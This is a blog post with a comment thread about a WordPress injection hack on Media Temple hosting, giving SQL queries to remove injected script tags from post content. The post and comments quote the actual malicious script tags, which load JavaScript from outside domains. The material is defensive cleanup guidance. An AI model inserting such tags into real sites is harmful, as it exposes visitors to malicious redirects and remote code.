DiggingIntoWordPress

by Chris Coyier & Jeff Starr

Media Temple WordPress Hack


It looks like Media Temple WordPress installs have been hit with a WordPress Redirect Exploit (404 link removed 2013/10/11). We got hit here at DigWP.com, but have cleaned things up and are taking steps to prevent it from happening again. Here is what Media Temple knows so far:

  • Visitors viewing posts on your blog may be redirected to a third-party site. This may be a site already blocked by Google.
  • Visitors may also be forwarded to the domain googlesearch.com, which has already been disabled.

They provide steps for cleaning things up, but at this point the entry point (how the attacker got write access to your post content) is not known.

The hack appends a short <script> tag to the post_content of every post in your database, so the third-party JavaScript is loaded on every post view. There are (so far) two known variations of the injected garbage:

  • <script src="http://ae.awaue.com/7"></script>
  • <script src="http://ie.eracou.com/3"></script>

To clean this up as soon as possible, back up your database and run the following SQL queries. They strip only these two exact strings (REPLACE matches literally, so a variant with a different domain or path is left untouched), and they do not close whatever entry point was used, so check the results afterwards:

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ae.awaue.com/7"></script>', '');

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ie.eracou.com/3"></script>', '');

And remember to change the table prefix from wp_ to your custom prefix if your install uses one (it is the $table_prefix value in wp-config.php).
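
The same cleanup carried one step further, as an added example rather than code from the original post: confirm which rows are affected before changing anything, look for variants the two strings above would miss, remove the known payloads, and verify. It assumes MySQL and the default wp_ prefix (swap in your own $table_prefix); the trailing-tag LIKE pattern in step 2 is my own generalization, not something the post lists.

```sql
-- Added example, not from the original post. Assumes MySQL and the default wp_ prefix.
-- Back up wp_posts before running anything below.

-- 1. Confirm which rows carry the two known payloads before touching anything.
--    post_type shows that revisions and drafts live in the same table and are cleaned too.
SELECT ID, post_type, post_status, post_title
FROM wp_posts
WHERE post_content LIKE '%<script src="http://ae.awaue.com/7"></script>%'
   OR post_content LIKE '%<script src="http://ie.eracou.com/3"></script>%';

-- 2. Look for variants the two exact strings would miss: any external <script> tag
--    sitting at the very end of post_content. The pattern has no trailing %, so it
--    only matches content that ends with such a tag; the NOT LIKE clauses drop the
--    two known ones so only new domains are listed.
SELECT ID, post_type, RIGHT(post_content, 80) AS tail
FROM wp_posts
WHERE post_content LIKE '%<script src="http://%"></script>'
  AND post_content NOT LIKE '%<script src="http://ae.awaue.com/7"></script>'
  AND post_content NOT LIKE '%<script src="http://ie.eracou.com/3"></script>';

-- 3. Strip the two known strings. REPLACE() is a literal, case-sensitive match, so one
--    UPDATE per exact string; the WHERE clause keeps unaffected rows untouched.
START TRANSACTION;   -- only effective on InnoDB; on MyISAM tables rely on the backup

UPDATE wp_posts
SET post_content = REPLACE(post_content, '<script src="http://ae.awaue.com/7"></script>', '')
WHERE post_content LIKE '%<script src="http://ae.awaue.com/7"></script>%';

UPDATE wp_posts
SET post_content = REPLACE(post_content, '<script src="http://ie.eracou.com/3"></script>', '')
WHERE post_content LIKE '%<script src="http://ie.eracou.com/3"></script>%';

-- 4. Verify: this should return 0 before you COMMIT. Re-run step 2 as well; if it
--    still returns rows, add a literal UPDATE for each new string it shows.
SELECT COUNT(*) AS still_infected
FROM wp_posts
WHERE post_content LIKE '%awaue.com%'
   OR post_content LIKE '%eracou.com%';

COMMIT;
```

Run steps 1 and 2 from the mysql client or phpMyAdmin first and keep the output: the row IDs tell you how wide the damage is, and any unlisted domain from step 2 needs its own exact-string UPDATE, because REPLACE() takes a literal string, not a pattern. Cleaning post_content removes the payload only; the entry point still has to be found separately.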

65 Responses

  1. Would you mind sharing if you’re on the shared or VPS enviro and if you know if the hack has affected both or just one?

    I’m reviewing our databases either way, but would be nice to quench the curiosity.

    • Jeff Starr

      The hack happened while the site was at Media Temple grid server (gs). As far as I know, this only affects sites hosted on MT (gs).

      • I 2nd that. Grid has always been a crappy technology though great in theory. Over the last couple years I’ve removed anything of my personal stuff and most clients from GS.

  2. Yep. I got caught with this here night before last – was going to email you but have been busy. Glad you’ve got it sorted and will follow your steps for my WP sites.

    • Jeff Starr

      Thanks to our readers, we were able to knock this out almost as soon as it happened. The post took a while because we actually switched servers after the event.

  3. Is this a vulnerability in the Media Temple hosting environment? Or does this hack happen on other servers?

  4. Sigh… one of my clients got hit… I think it’s past the time I get him to move OFF of MT.
    For ref he’s on grid

  5. Whoever designs a program that will protect, detect, block, live update, scan, and repair individual sites much like your typical anti virus-firewall program is going to become a very wealthy person.

    • I think such a program is impossible Steve. The analogy I always use is that a website is like a house, if someone wants to break in they’ll find a way. The only fool-proof way to prevent that break-in is to not own a house/web-site.

      • Write a script that commits files and database dumps to an external SVN server and run it through cron every so often. If it’s attacked you would be able to just roll the changes back.

      • Jeff Starr

        I second the idea of keeping current backups, using any method that fits. I’m a backup junkie, keeping hourly backups of key sites, and daily backups of others. I think it’s one of the best (and easiest) security measures possible. Essential.

        • My current backup solution is a cron script that copies everything over to Amazon S3 on a daily basis. It’s wicked cheap. :)

      • True, it would take a lot to produce and provide commercial anti-hack programs. Until then the best bet is making life as difficult as possible for these hackers. Too many easy targets as it stands right now.

    • VaultPress is the closest thing right now. I’m using it on CSS-Tricks and it does real-time backups and security scanning. I’m trying to get DigWP on it as soon as possible.

  6. Media Temple is saying that it was not a vulnerability in anything Media Temple specific, but this time I’m really not buying it.

    How can it specifically affect two clusters of (gs) servers, affect every single WordPress installation in the entire account, and even affect sites as hardcore locked down as this one was, and not be a Media Temple-specific vulnerability?

    I really like MT customer service and think they are great folks, but the (gs) platform I can absolutely not recommend.

    This site no longer runs on it. For now it’s still on Media Temple but moved to a (dv) plan which I’ve never had any trouble with at all.

    • Design Informer July 17, 2010

      Yes, I’ve heard so many complaints thus far with grid servers on Media Temple but so far, I haven’t had a problem with their VPS which I would recommend. Hey, you get what you pay for!

    • I agree with you; the GS plan is pretty insecure and has so many problems. As a DV user I have had no such problem, and everything just goes on without any issues.

      MT guys should look at the GS infrastructure urgently, because many bloggers are using GS, since it is a good price.

    • I’m guessing from the quick turnaround you’ve moved it to the css-tricks server. Will this be a permanent change or are you planning on moving it to another dv/provider?

      On backup, my method is to backup each day and optimize the db an hour after the backup.

      Need to spend some time figuring out how to do a grandfather, father, son system using a single cron job.

    • Do you have an entry-level hosting service you would recommend? I’m looking to move off of my current hosting service as I’ve had bad uptime problems with them, and was considering (gs) as I’d heard so many recommend Media Temple. I can’t afford (or justify) VPS or over $20/month at the moment, so do you have another hosting service you could recommend? I’d be very interested to know; I’ve had problems with several shared hosting companies, and was hoping MT (gs) would be better…

      • Hi there,

        I swear by downtownhost; the prices are not dirt-cheap, but that’s because their technical support is top-notch, fast and helpful, always going beyond the call of duty, in my opinion.

        • Hmm … I’d never heard of them before. You know, the worst thing with every web host out there is that there are plenty of people that say they’re great, and tons more that say they’re awful. I thought MT was getting more on the praise side, but now I’m hearing more problems with (gs). Plus, it is sort of pricey for shared hosting…

          Anyone else with ideas? Anyone you can suggest, Chris?

      • Jeff Starr

        I can recommend A Small Orange for inexpensive yet reliable hosting service. They do have their share of downtime, but overall they have been great. And the help-desk crew is top-notch. I posted a review several years ago – the prices may have changed a bit, but their service still rocks.

      • I have had great luck with WebFaction.com for over a year and a half now. And I’m a very picky hosting customer! Fast servers, generous plans and starts under $10/mo. I recommend them even without a promo code but if you feel like giving me credit, my referral code is my Twitter username which you can probably track down easily :-)

        • Nope, they’re no good either; we’re about to leave WebFaction. Our shared host seems to be overloaded and they complain about us overloading the server. Our site is down frequently. They have no phone number to call to get help or information. The control panel leaves a LOT to be desired. Many missing functions that you’d expect to find in a cPanel shared hosting account.

      • Aximilation July 28, 2010

        I’ve been using linode.com for a while, $20 VPS, great track record for the last 7 years, what are you looking to host? I could cut your costs and manage a server for you if you’re interested…drop me a line webmasterATaximilation.com
        :-)

    • We would like to firmly state that there is no information indicating that our infrastructure is the source of this incident. (mt) Media Temple’s architecture is secure. Furthermore, we would like to point out that this incident is the result of insecure 3rd-party software applications installed on customer servers. These facts have been verified by a 3rd party reviewer, Sucuri (http://sucuri.net). It should also be noted that these attacks have occurred on WordPress sites residing on various (dv) Dedicated-Virtual Servers as well.

      Full details are available at: http://mdtm.pl/cg6zR2

      • Forrest July 21, 2010

        You seem to be ignoring the fact that this exploit only took place on certain hosts, including Media Temple. Secondly, if you look through the one mention of this exploit on the sucuri.net site – http://blog.sucuri.net/2010/06/bluehost-ceo-blog-and-others-exploited-by-domainameat-cc.html – you’ll notice they don’t blame WordPress anywhere. So your statement of “this incident is the result of insecure 3rd-party software” and citing Sucuri is blatantly false.

        I run a ton of WP sites, and the only ones that have had any problems have been on Media Temple.

        • I have a lot of WP blogs on Media Temple. 3 of them had been offline for over a year, and when I checked each of their databases they had the hacked code too! How does an unpublished offline domain get hacked if it’s not the insecure infrastructure that ties all the databases together?

      • The link provided above is to an outdated security post. Please visit this post for more up-to-date information.

  7. Sallie Goetsch (rhymes with 'sketch') July 18, 2010

    Could you use the Find & Replace plugin to do that fix?

  8. In light of the recent attacks against WordPress sites, we would like to firmly state that there is no information indicating that our infrastructure is the source of this incident. (mt) Media Temple’s architecture is secure. Furthermore, we would like to point out that this incident is the result of insecure 3rd-party software applications installed on customer servers. These facts have been verified by a 3rd party reviewer, Sucuri (http://sucuri.net).

    Full details are available at: http://mdtm.pl/cg6zR2

  9. Thanks for this! I can stop punching my face off now

  10. Not to stick up for (mt), but this also happened on a client site I have running WordPress on GoDaddy.

    The only “3rd party” plugins I’m using are:

    – Akismet
    – Google Analyticator
    – Google XML Sitemaps

    The latter being the most recent. All are up to date btw.

    I will point out that GoDaddy seems to have repaired itself (lol i know right – alien technology). Still waiting on (mt) to answer my ticket. 15 hours and counting ;)

    /shrug

  11. And now on top of both my sites being hacked the sites are down due to some kind of an issue at MT…..

  12. just reviewed 6 client sites on media temple, all clean.

    • Scratch that, a customer on a media temple gs account was just hit… hopefully the rest are ok… hard to believe it’s not something with the platform…

  13. I’ve run numerous WordPress sites on Media Temple GS accounts for years and have never had a problem (and their support folks are the best in the industry). After having been hacked on other servers, I’ve become very security conscious though. My passwords are long random strings, as are database prefixes. I don’t install any add-ons without first editing them and correcting their security vulnerabilities (which most add-ons have!). I also have an extensive .htaccess file similar to Jeff Starr’s.

    A DV server is certainly more secure IF you have the unix skills to back it up. Most people (imo) don’t and inadvertently open themselves up to all sorts of attacks.

  14. In this case I would tend to believe MediaTemple that their architecture was not compromised as they have stated. The way these attacks work is a script scans a bunch of IP addresses for a specific HTTP page (in this case some WordPress form) and then tries to submit JavaScript through the form.

    If the form handler does not correctly prevent this, it is possible to update database tables or files on the file system without having account access. Or worse, it can give them shell access to your account to do as they please. This attack is likely not coming from inside MT server/architecture and out – it is coming from an attacker script on the outside. (see XSS or Cross Site Scripting for a more technical explanation)

    The reason MediaTemple is targeted (or GoDaddy or other big name web host), is there are likely lots of vulnerable targets in that IP range and so they are sure to have a successful exploitation.

    Regarding one discussion above about commercial software that can prevent this – there are many types of enterprise level products or network appliances that do exactly this. Companies like IBM, HP, Cisco and McAfee all offer Intrusion Prevention (IPS) products which prevent web based attacks.

    There are also several Web Application Firewall products which will also intercept attempts to inject scripts. Unfortunately, these are expensive solutions and the web host would have to implement it on their network (it is not something you can set up yourself). There are some host-based solutions that do some types of prevention against web-based attacks like XSS, although these would likely require root access to install on your server, so you may be able to use them with MT dv but not on shared gs.

    As one person mentioned, despite the best commercial protection products, someone will find a way to get around it.

    • “The way these attacks work is a script scans a bunch of IP addresses for a specific HTTP page (in this case some WordPress form) and then tries to submit JavaScript through the form.”

      Not according to Media Temple–they say this is not a WP vulnerability.

      If MT wants to keep our trust they need to provide more information. Blaming this on mysterious “insecure 3rd-party software applications” accomplishes nothing. What 3rd-party software? This mystery application would still need the database password, right? Unless the hacker got into MT some other way–am I wrong? (Rogue employee looking to make some extra money on the side?)

      This mysterious unnamed app would need more than a password, because I have MT set to only allow access to two IP addresses. Yet I was still hacked! This wasn’t somebody cracking several passwords here at my apartment to spam one little blog with only a few visitors per month–to advertise some fake javascript app?!

      Nobody is blaming WordPress. Nobody is blaming MySQL. So what’s the problem? So how did they get into our databases?

      MT changed our MySQL passwords several times this year. If their architecture is so secure, why were they doing this? Did some hacker figure out the password generation algorithm? I don’t think so–like I said–I have IP restrictions. What am I missing?

      • I would like to help clarify a few things that you may misunderstand. Hopefully this will clear up any confusion that you have about the current situation.

        Firstly, the process described above in which JavaScript is injected through a form is possible. This is not a WordPress vulnerability but rather an insecurity built into the way PHP functions. There are ways to secure PHP forms that exist on websites. This is a great guide for using form keys to secure any forms on your site from brute force attacks.

        The phrase “insecure 3rd-party software applications” simply means the common applications that can be found online. While WordPress itself is not inherently insecure, there are many customizations and things that can be done to a basic WP installation to render it insecure.

        Part of the coolness factor of WordPress and what has made it extremely popular is its openness. This is also what makes WordPress vulnerable to attack, especially through its open-sourced additions. The most common insecurities for WordPress (or any open source CMS, e.g., Joomla, Drupal) come through 3rd-party themes and plugins. Sometimes you will also get insecurities through file permissions; however, this is much more rare. You can find a good repository of exploits affecting all web applications here.

        If you have limited access to your site to only two IP addresses, that would not limit a brute force attack or malicious code being injected into your site through a vulnerability.

        With regard to the MySQL passwords being changed. That was implemented for two reasons. To deal with an ongoing “spamdexing” exploit that people were falling victim to and to remove any “clear text” database passwords stored in our system. You can read all about this incident here (404 link removed 2013/10/11).

        I hope that this helps clarify a few things for you. If you have any further questions regarding your (mt) Media Temple services, please feel free to contact us at any time.

        • Thanks for the update Travis. I love how open and sharing Media Temple is about these types of security issues.

          As logical as everything might be, I’m just extremely snake-bitten on the (gs) service and I’m not sure any amount of written or spoken logic can convince me to trust it. I’ve had sites hacked again and again and again on (gs) despite our best security efforts, not to mention the frequent downtime. Then I have a bunch of sites on (dv) as well. Never been a problem once. No hacks, no downtime, nothing. And I’ve invested seriously less time in hardcore-lockdown procedures on those sites. Is that just random? How else can it be explained? Just through my own experiences and human nature, when people ask me about Media Temple, I tell them to stay away from (gs) but (dv) is fantastic.

        • Forrest August 19, 2010

          Travis, looks like you posted yet another spin job to try and dampen the bad publicity MT is getting about all this. The information you posted again contradicts what MT has said before.

          When I contacted MT support about this issue, MT support specifically blamed WordPress for the “security loophole.” MT got a lot of flak for this, and after it was pointed out it’s not true, now you guys are trying to spin it again with “This is not a WordPress vulnerability but rather an insecurity built into the way php functions.”

          Secondly, MT continues to blame third-party scripts while also stating they don’t know how the exploit was accomplished.

          So here we have MediaTemple both pointing the finger at WordPress and claiming they don’t know how this happened. The only thing MT says they are sure of is that it wasn’t a problem on MT’s system.

          This coupled with the false statements made by MT in the previous comments to this post, point out that MT is either flat out lying to people, or clueless about what’s going on. Either way, MT is showing itself to be a horrible host. Hosts can make mistakes, and it does happen. But pointing fingers, constantly changing stories… are the worst ways to overcome a mistake.

        • Also, Forrest. If you are willing to email your phone number to our VP of Customer Service, andrew at mediatemple dot net, he would be more than happy to listen to your concerns and discuss what (mt) Media Temple is doing with regard to this situation.

      • I fail to see how explaining that code injection through a php form is a possible way malicious code can be introduced onto a server through a site running WordPress is spin. This was not an attempt to explain away something but rather a way to clarify something.

        Let’s be clear, it is possible to inject malicious code into a website through a PHP form, regardless of it being a form on a WordPress site or not. I’m pretty sure that everyone would agree this is a possibility. Also, I never said, nor did anyone else state, that this is how sites on our system are being exploited, it’s simply a way they could be exploited.

        Yes, we cannot definitively point to a single point of entry for these hacks on our system. The reason being that there are a number of ways that someone with malicious intent can hack a website. We cannot rule out any on the application level. What we have ruled out, thus far, is our own system. This has been verified by us as well as third-party audits.

        I would like to know what the “false statements” made by us previously in this post are. I can assure you that everything we have stated is true. We are not changing our story either. However, as the situation is ongoing, the story is evolving as more information becomes available. This is the case with the change in how WordPress factors into everything. Here’s our stance on WordPress, directly from our blog:

        WordPress has been mentioned a lot lately. Is this application specifically vulnerable?

        No. WordPress is a high-quality project that updates their software whenever a security problem is found. The latest versions do not contain any vulnerabilities that we are aware of. If you are running an old version, please update yourself. This is a common practice and should be familiar to any Windows or Mac OS X desktop user.

        This being said, due to its ubiquity as one of the world’s most popular open-source publishing systems, WordPress is often the target of the payload with code injections and backdoor entry points after the attackers have maliciously gained access to a user’s website. The fact that WordPress is frequently a payload target DOES NOT mean that WordPress itself is vulnerable. It just means it’s popular and very powerful. You should continue to use it and we think it’s great software.

        This is not a change in the story, simply a clarification. I don’t know who in our support department you spoke with. If this was early enough in the situation, it’s possible you were wrongly told that WordPress was the “source” of the problem. We quickly realized that this was falsely blaming WordPress itself and wanted to make sure that we differentiated between being the “source” of the problem and being “targeted.” What you construed as a company stance was, likely, a communication breakdown at our support level.

        • I was going to leave this alone, because I’m about to close my MT account (for different reasons) but this last post got my attention. So why not fan the fire a little more here?

          I think enough people were affected to point to a possible problem with MT.

          Why do we suspect this?

          1. Other big hosts (like Network Solution) messed up recently and allowed one hacker to attack everything. Who else, was it Godaddy? MT has an awesome track record–BUT you got to admit, MT is a big target, like these other big hosts that were targeted. We would like to think MT is smarter than Netsol (for reasons I need not explain) but is that really a valid assumption? If it looks like a duck, quacks like a duck, etc.

          When you’re big you attract enemies, that’s life. The nail that stands up gets pounded down. ALSO we (the unwashed masses) have no idea how the “grid cluster” thing works. We have pretty diagrams–as of the Cluster 6 storage meltdown–but seriously, we have no idea what’s really going on under the covers. I read all the “gs” marketing gibberish with glee but afterwards I’m still thinking I’m on a shared server. Once I had a PHP script go into a big nested loop and a tech told me I took down 80 servers on the grid or something absurd–COME ON seriously? I’m not buying it. I admit the “(gs)” marketing dept. inspired diagrams are cool looking–but I digress.

          Let’s not beat around the bush–Matt was very pissed he was blamed for Netsol’s ineptness. And I applaud Matt for standing up against those accusations. He’s got a great reputation–the guy is practically a superhero of the Internet. So I think MT is hesitant to pick a fight with Matt in any way, shape or form, because they know a storm of bad press is just around the corner if any accusation is unfair. Think about it–how many times has your host accidentally changed all your permissions, breaking your code? It’s happened to me more times than I care to remember. Oops. Hosts make mistakes like this all the time–that’s just the nature of this business.

          I give MT a lot of credit–they seem to have smart minds running the show–but anybody we can name specifically? MT doesn’t have an Internet super-action hero we can rally around, that I know of.

          2. I open a support ticket about this and a tech admits one bad user *could* affect the entire grid. I would post a quote but it’s not worth my time. So how is this “secure” architecture? Seriously, tell me. Either you’re secure or you’re not. You need to get your story straight with your employees, or admit you are “not sure” you are secure.

          In my opinion, this is the problem with businesses today. No integrity. I haven’t taken a survey, but it seems most people hate deception. Not only that–it’s a great way to start a fight. Some fool this morning quoted my wife $49 for an oil change. Slick guy thinks he’s going to take advantage of a young woman adding extra charges beyond what he quoted her. I walk in and he’s trying to educate me about the extra charges. I say to him, “What did you quote her?” That shut him up because he’s not going to call my wife a liar. You quoted her $49 and that’s what I expect to pay, I don’t care what planet you’re on. So you think you can make a few extra dollars jerking people around? How many times has this happened to you lately? Let me tell you, it may fly for a while, but in the end you’re up against the truth, it’s not a sliding scale. It’s not about the money, it’s about the right thing to do–tell the truth as best you can. If you ignore that basic principle, even if you live in Culver City, you’re halfway up Sh** Creek. Probably your mom told you this when you were 5 y/o (age of reason? LOL) but I think some people need a reminder. A reality check is a good thing. How do you define “secure” well now you’re playing word games–please tell me what I’m missing here.

          3. Back to technical details. Only my dad’s blog was affected and he had WP version 2.8.6 running on MT. No other scripts or sites besides boring non-executable HTML. No hardening besides the defaults. Maybe this information will help you locate the attack vector? I doubt it. Obviously it’s a somewhat dated version. It was using a default Kubrick theme and no plugins besides Akismet. That’s all I have on MT at this time–I moved all my other blogs to Linode several months ago. Why didn’t I upgrade him past 2.8.6? Besides backups, the easy ability to move elsewhere and avoiding unnecessary upgrades, the only real threat I’ve heard about, in recent history, was for blogs that allowed open registrations. The last attack WP was found at fault for–as far as I know (and I do follow these things more closely than most people)–was this one checkbox “Anyone can register” where you allow anyone to register to post comments–this is really the only way to hack WP that I’ve heard about within recent history. If this box wasn’t checked you’re pretty much safe, besides brute force attacks on your password. The attacker registers to post a comment or whatever, then somehow changed his userlevel–Yes I think it was some form injection trick. If you can show me where 2.8.6 is really open to a database attack–I wouldn’t mind reading that info out of curiosity–not that it affects me much. I really don’t have much skin in this game here or any personal gripe with MT, besides finding the truth about what happened. In any case, I have millions of visits on 2.8.x and 2.9.x and never any problems. But is 2.8.6 really the problem here? Is this what all the chatter is about? Were all these other MT customers using 2.8.6 through 2.x.x? I doubt it, or we would have heard something more definitive by now.

        • Forrest August 21, 2010

          Travis, your reply makes even more clear your top priority is just to spin this problem to avoid more bad PR. I didn’t say that explaining how code injection is a problem was a spin move. Nice try at putting words in my mouth to try and dispute what I wrote. It just shows you have no real argument. The problem with dealing with a lack of integrity is that it eventually comes back to bite you. And as I’m about to point out, you just dug your hole even deeper.

          Let’s be clear, it is possible to inject malicious code into a website through a PHP form, regardless of it being a form on a WordPress site or not. I’m pretty sure that everyone would agree this is a possibility. Also, I never said, nor did anyone else state, that this is how sites on our system are being exploited, it’s simply a way they could be exploited.

          Perfect example of just another attempt to spin the situation. In the information MT provided for the first month + after this issue started occurring, MT flat out blamed WordPress for the exploit and flat out blamed third-party scripts for the exploit. Now that it’s been pointed out MT also said they didn’t know how this exploit is taking place, you’re basically saying “well, all that info we posted on what happened and why it’s not a problem on our end, wasn’t how it actually happened, just how it could have happened.” It could have been an evil plot carried out by other hosts to tarnish MT’s reputation as well. Or maybe it was aliens.

          I would like to know what the “false statements” made by us previously in this post are.

          As you later noticed, one is further back in this thread. More to be brought up below.

          I can assure you that everything we have stated is true.

          This is just a prime example that you’ve been traveling down a path of untruth so far that you’re now lost in it. MT has both specifically said that:
          – This exploit was specific to WordPress
          – Is [WordPress] specifically vulnerable? No

          So which is it? You can’t have it both ways. Up until at least late July MT was saying it was specific to WP, and now MT is saying it’s not. So if everything MT has said is true, then how are these two contradictory statements possible?

          We are not changing our story either. However, as the situation is ongoing, the story is evolving as more information becomes available.

          Are you serious? You’re not changing your story, but the “story is evolving”? Evolve = change. Do you not see how completely ridiculous it is to say that you’re not changing your story, but in the very next sentence say that it’s “evolving”? Does that not sound like spin to you?

          it’s possible you were wrongly told that WordPress was the “source” of the problem.

          But wait a second, above you said “I can assure you that everything we have stated is true.” So which is it? Can you assure me MT has been truthful, or are you now saying it’s possible MT has been untruthful about the matter?

          We quickly realized that this was falsely blaming WordPress itself

          So how does “falsely blaming WordPress” constitute “everything we have stated is true”?

          Thanks for the invite to talk to your VP of customer service, but you’ve clearly demonstrated that MT is a company that believes true = false, and among other issues, I’m not going to spend more of my time on MT other than moving a client from MT and making sure others are aware of your corporate values.

          At a certain point I hope you guys notice just how badly you botched this whole situation, especially by pointing fingers.

        • Forrest-

          First, let me apologize for the tone of my previous response. It comes off as incredibly aggressive and that is not what I wanted. I simply want to make sure the correct information is getting out.

          It is clear to me that we have lost your trust. For that, I’m truly sorry. I’m sorry that you feel we have been less than forthcoming with the truth about this entire situation. That’s a clear failure with our communications and it is something that we’re trying to improve.

          As big a company as (mt) Media Temple is, we’re not a monolithic Fortune 500 company with a PR Firm on retainer to spin our crises into gold. What we are, is a group of support technicians, system engineers and customer service reps who simply want to provide the best hosting solution for our customers possible.

          I still feel like you have unanswered questions. I know that you’re leaving our service, but I still feel that you have a right to know what happened. The offer still stands to speak with our VP of Customer Service. You can also contact me any time at travis at mediatemple dot net. Let me know what your questions are and I’ll try and find someone not associated with (mt) Media Temple who can answer your questions.

  15. My personal blog, which I haven’t really unleashed to the world yet, runs on Mt (gs) and I found these pieces of script, which I got rid of, but I have been searching ever since to find out what they’re for, so thanks for the post!

  16. My site got hacked as well, all the same symptoms; however, I have no instances of either of the above mentioned scripts.

    Have any other scripts or fixes been identified?

  17. Too bad that I haven’t found this post until today. I have all of my development installations on my (gs) account first (and leave them there for testing, extending, etc.). And all of them got hacked. From 2.6 to 3.0 – everything hacked. Even my own – pretty secure – installation. I can’t read the same text their marketing guys have been writing for a week or so on every blog and similar: “it’s a 3rd party problem”. Plus: I can’t verify any of their “known issues” like new users, etc. My theme was clean (found a backup on hard disk from the day before I found the hack) and only my db was hacked. I have secure passwords etc., but their answer always stays the same: “It’s not our fault”. Thanks for that info… But it’s not true. I even wrote a plugin to remove the script and offered them a version they could share with their customers… but no answer the first time and no answer after I asked them about exchanging it for some sort of partnership. As far as I understood the behaviour of (mt): they are simply not interested in their (gs) customers. I already have a new account at all-inkl and will switch when my recently paid (gs) account runs out. Getting mad about the support and the behaviour for two years is enough. (mt) => not recommended!

    • Hey, how can I get that plugin of yours to remove the script?
      My blog is filled with the stupid hack…

      Thanks man!!

  18. I found the same problem on one of my servers calling a different script. Here’s the SQL statement I used (apologies if quotes get curled or HTML gets stripped):

    UPDATE dfwwptech_posts SET post_content = replace(post_content, '<script src="http://ue.oeaou.com/31"></script>', '');

    If the code does get stripped, my code is the same as the code in the post, just swapping out [http://ue.oeaou.com/31] for the script src.

  19. For a complete newbie like myself, could somebody point to a step by step guide to ridding this script from my MySQL database using phpMyAdmin? I am infested with this damn http://ue.oeaou.com/31 script, and while I deleted it from a few pages, that has not been enough. I need to kill it from within the posts themselves. I am assuming a search and replace type of query would work, but I am not quite sure how to do it.

    Thanks in advance.

  20. Open phpMyAdmin.
    Click the “SQL” button.
    Copy the UPDATE … statement in this post into the SQL box.
    Change the prefix wp_ to your prefix.
    Change http://ae.awaue.com/7 to whatever yours is.
    Click Execute.

  21. “Change the prefix wp_ to your prefix”

    That would be the name of the database powering the specific site in question? (I have 2).

  22. Exactly. Whatever table has the problem, you should change “wp_posts” to match your table name.
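The phpMyAdmin procedure in comments 18 through 22 pasted into one script, as an added example that is not part of the original post or any commenter’s code. It assumes a standard WordPress schema on MySQL with the default wp_ table prefix (change wp_posts to yourprefix_posts, as above) and covers the three injected strings reported on this page: first it lists which rows still carry an externally sourced script tag and what host it points at, then it strips each known string, then it checks that nothing is left.

```sql
-- Added example, not the post's or a commenter's code.
-- Assumes MySQL and the default wp_ prefix; edit wp_posts to match your prefix.
-- Back up the database (e.g. mysqldump) before running the UPDATE statements.

-- 1. Find affected rows and show the injected src, so that variants whose
--    hostname differs from the three known ones become visible. Review this
--    list first: a legitimate post that embeds a remote script also matches.
SELECT ID, post_type, post_status,
       SUBSTRING_INDEX(SUBSTRING_INDEX(post_content, '<script src="http://', -1), '"', 1) AS injected_src
FROM wp_posts
WHERE post_content LIKE '%<script src="http://%';

-- 2. Remove the known strings exactly as injected. REPLACE matches literally,
--    so only these three tags are touched; any other <script> is left alone.
UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src="http://ae.awaue.com/7"></script>', '');
UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src="http://ie.eracou.com/3"></script>', '');
UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src="http://ue.oeaou.com/31"></script>', '');

-- 3. Verify. Expect 0 once only the known strings were present; anything
--    remaining is a new variant whose exact tag belongs in a further UPDATE.
SELECT COUNT(*) AS remaining
FROM wp_posts
WHERE post_content LIKE '%<script src="http://%';
```

Run step 1 on its own first and read the injected_src column; if it shows a host not listed in step 2 (as in comment 16, where neither known string was present), copy that exact tag into a further REPLACE rather than widening the match, since a pattern-based delete would also remove script tags you put in your posts on purpose.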

  23. I’m not a fan of PhpMyAdmin–it’s junk IMO–wouldn’t recognize my user-pass (after I changed it) for whatever reason. Maybe the real problem here is PhpMyAdmin, LOL.

    Anyway, another option is MySQL Query Browser, a free app from Sun–err Oracle. Windows, Mac and Linux versions avail. Looks like there’s a new version called “Workbench” – http://dev.mysql.com/downloads/workbench/

  24. Forrest, you’re just being an ass looking for a fight. If you don’t trust MT then just don’t use their services.

    Travis, don’t bother trying to bend over backwards to please someone who clearly just wants an argument. You guys know your stuff the best and I have not detected any dishonesty on your part. I can see the bigger picture as well as the details and I know you guys are doing all you can to pinpoint the source of the hacks. I don’t know if it’s anything to do with the grid system but I am aware that MT is not the only host to be targeted. That tells me that the grid system is no less secure than any shared environment out there (the ones that are set up correctly).

    I’m with A Small Orange at the moment while I’m building and developing my WordPress site, but after it grows a fair bit, I’ll be considering MT for my future hosting needs. By then the hack issue should (hopefully) be dealt with.

    • i don’t think forrest is looking for a fight, he wants a *good* explanation on exactly what happened on their hosting platform. i emailed travis for this information on 8/24 and am still waiting to hear back.

      whatever the problem is, media temple isn’t handling it very well.

    • Matt is correct in his response below. And not only that, but I’m hoping MT learns from their mistakes in this matter (and even Travis said there’s at least been a clear failure with our communications and it is something that we’re trying to improve), and that the facts of this whole issue are clear.

      I have not detected any dishonesty on [MT’s] part

      That just shows you haven’t put much effort into your attempt to detect dishonesty. As I previously noted, MT first blamed WordPress specifically, then backed off, then claimed they never blamed WP. The claim that they never blamed WP was 100% false. Travis even said We quickly realized that this was falsely blaming WordPress itself.

      So while you may be honest in your statement, it’s not accurate. Even MT admitted that they were falsely blaming WordPress.

      I don’t know if it’s anything to do with the grid system but I am aware that MT is not the only host to be targeted. That tells me that the grid system is no less secure than any shared environment out there (the ones that are set up correctly).

      Sorry, but that’s just bad logic. Unless you’ve done a full security audit on every host out there, you cannot rationally claim that MT is “no less secure than any other shared environment”. The fact remains that the vast majority of hosts were not impacted by this exploit. It does appear a couple were. All that means is that the exploit was shared, not at what level the exploit took place or where the fault is.

      Now, I can’t claim that MT’s service is the source of the issue. There are several comments on the web about this exploit taking place even when sites were “disabled”, but obviously I can’t verify those (nor exactly what “disabled” means to them.)

      But I can point out, and will continue to do to anyone who wants to argue the facts with me on this matter, that MT botched this whole situation, wrongly pointed the finger at WP… and previously I could say that MT was still not learning from all this, and still spewing spin… but after the last response from Travis I was at least happy to see some admission of guilt at least as to how this whole issue was handled.

      Ideally they’d come back and be able to give a detailed explanation as to the specifics and thus know exactly how the hack took place. Right now it seems like they’re still of the mindset “we can secure our system, but not third party systems (eg JS, MySQL…) against attacks.” If they want to stay there, fine. I realize that’s the status quo for the industry and can’t fault them for that.

